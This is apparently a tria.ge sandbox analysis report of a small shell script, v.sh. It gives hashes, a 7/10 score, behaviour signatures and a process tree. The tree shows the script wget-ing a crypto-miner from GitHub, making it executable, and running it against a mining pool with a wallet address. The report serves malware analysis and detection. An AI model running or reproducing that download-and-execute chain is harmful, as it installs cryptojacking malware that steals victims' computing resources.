Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

1

v.sh

ubuntu-24.04-amd64

7

Analysis

  • max time kernel
    1s
  • max time network
    2s
  • platform
    ubuntu-24.04_amd64
  • resource
    ubuntu2404-amd64-20240523-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2404-amd64-20240523-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system
  • submitted
    13/07/2024, 16:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    v.sh

  • Size

    210B

  • MD5

    c0509438798d06d2af34b3c438c03535

  • SHA1

    9a75456855a4c9f572dbfa8d4ffc58c6b6c95ebf

  • SHA256

    f6ee0a8d2a02e947ad9f7be5bd3bee76f785161675ba02cfda1bf25937dd36f2

  • SHA512

    1a7bff03425010611693998ab693862eaef935fbef330f92de055183242d0b5ed9f142b9ecc15b1451efa0d280416b20cdadce12142ad415939984c2be35347f

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/v.sh
    /tmp/v.sh
    1⤵
      PID:2479
      • /usr/bin/wget
        wget https://github.com/MomboteQ/Free-Crypto-Mining/raw/main/verus/cc
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:2480
      • /usr/bin/chmod
        chmod +x cc
        2⤵
          PID:2487
        • /usr/bin/clear
          clear
          2⤵
            PID:2488
          • /usr/bin/nproc
            nproc
            2⤵
              PID:2489
            • /tmp/cc
              ./cc -a verus -o stratum+tcp://us.vipor.net:5040 -u RHACKERwSVgjTvV4vNiTjmrkLTD7a92ALD.Triage -p x -t 1
              2⤵
              • Executes dropped EXE
              PID:2490

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • /root/.wget-hsts
            Filesize

            215B

            MD5

            ef750b8dc3da5aa3d3c2a052a449e90b

            SHA1

            f719c9fe70597a9678fa6ab4c02bcb4a6a566737

            SHA256

            a24e104f579c9dd9cecf22ac9a9505b32df5914a15243391f1e728e692645854

            SHA512

            302c6f74db4e729ce24194e16d2b1a65756df4e6b71be5eef67131d9f61ae4c20fdea881f1da7644f88317632eedfdc9ea40518952849c6ddc5b2c4b32eb63d8

            Download Submit

          • /tmp/cc
            Filesize

            196KB

            MD5

            4011d473f6b06caa7f3d514e4eeb2184

            SHA1

            529bda4d64920cac51baa6b34b8bcabf19d97248

            SHA256

            bf7d1a01e88322991a824676601b46be7625b50a9d8ee8de085cc86ba76f7bc2

            SHA512

            45f9da5d9f43c1876fc3659a8e7e03b9d06ec83bf6c8d237daf3809cbec01a5c59688a1cf4780d695750fc42920428ff69545f5dce11b888418df919c3625f39

            Download Submit